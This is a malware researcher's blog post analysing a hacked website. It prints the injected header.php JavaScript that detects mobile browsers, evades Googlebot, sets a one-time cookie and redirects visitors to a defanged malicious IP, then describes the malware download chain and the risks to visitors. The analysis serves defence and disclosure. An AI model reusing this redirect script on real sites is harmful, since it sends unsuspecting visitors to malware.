Website Malware Targets Mobile Platforms

  • January 2, 2017

Navigating the web on a mobile device can be tricky even when you’re browsing clean sites. If hackers are involved, the frustration of a pop-up can turn into the dangerous possibility of harmful mobile malware.

The increase in mobile internet browsing has prompted attackers to adapt their techniques, targeting mobile-specific platforms and distributing spam and malware to these devices. Being proactive about the security of your site is key to keeping your visitors safe whether they’re on a desktop, laptop, tablet or phone.

Mobile Browser Redirects from Hacked Sites

Hackers are taking advantage of the growing mobile audience by showing unwanted pop-ups and redirecting them to malicious sites. Recently, we analyzed a hacked site that was demonstrating these exact behaviors. During our investigation, we found the following code infecting the header.php file of the theme:

<script>
if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("ooglebot")==-1){if(/(android|bb\d+|meego).+mobile
|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox
|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|
xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)
|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|
cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|
fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|
tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|emu|jigs|kddi|keji|kgt( |\/)|klon|kpt |
kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)
|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)
|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a
|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|
ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-
|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60
|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){
var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}}
)(navigator.userAgent||navigator.vendor||window.opera,'hxxp://185(.)93(.)187(.)41/kt/JpNx9n');}
</script>

This code specifically targets mobile devices and redirects them to a series of malicious websites:

  • Starting from: hxxp://185(.)93(.)187(.)41/kt/JpNx9n
  • Then, going to different sub-pages, such as hxxp://www(.)bestphoneapps(.)mobi (which is involved in malware campaigns)
  • Finally landing on hxxps://mobrevflwms(.)com, also related to malware campaigns

Mobile and Desktop Malware Downloads

Depending on the mobile browser and device your visitors are using while accessing the website, victims are either presented with a toolbar download page or are redirected to a mobile app download page. Both of these scenarios put website visitors in a dangerous position. If victims inadvertently add the mobile malware components to their devices, there can be serious consequences.

A few of the dangers of mobile malware include:

  • Allowing attackers to arbitrarily access, read, and interact with emails and backend interfaces;
  • Stealing of your data such as media files;
  • Ads being injected into pages they were not supposed to;
  • Giving sensitive information from their browsing activity;

If visitors happen to find themselves on those pages on Desktop they may be exposed to situations such as:

  • Potential installation of ransomware;
  • Installation of PuPs (Potential unwanted programs such as as injectors);
  • Installation of Keyloggers;
  • Installation of various rootkits or have your computer added to a Botnet and used against other targets;
  • They can covertly take over your browser and carry out actions in any backend you have access to such as any website you own/manage;

As a rule of thumb its best to never install anything you don’t explicitly mean to, and if you find yourself in a page that has no relation to the website you were at to immediately leave.

Protecting Your Site

As website owners, it’s our responsibility to ensure that our visitors have the best experience possible and will not be at risk when accessing our web properties.

If you’re concerned about your site, or a site that you’re visiting, scanning the site can provide some insight. Our free online scanner (SiteCheck) is tailored to emulate different mobile user agents and warn users about possible issues that may affect your computer when accessing a particular website.

If you are detecting similar redirects or suspect any unusual behavior, we are here to help.

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Related Tags
Related Categories
You May Also Like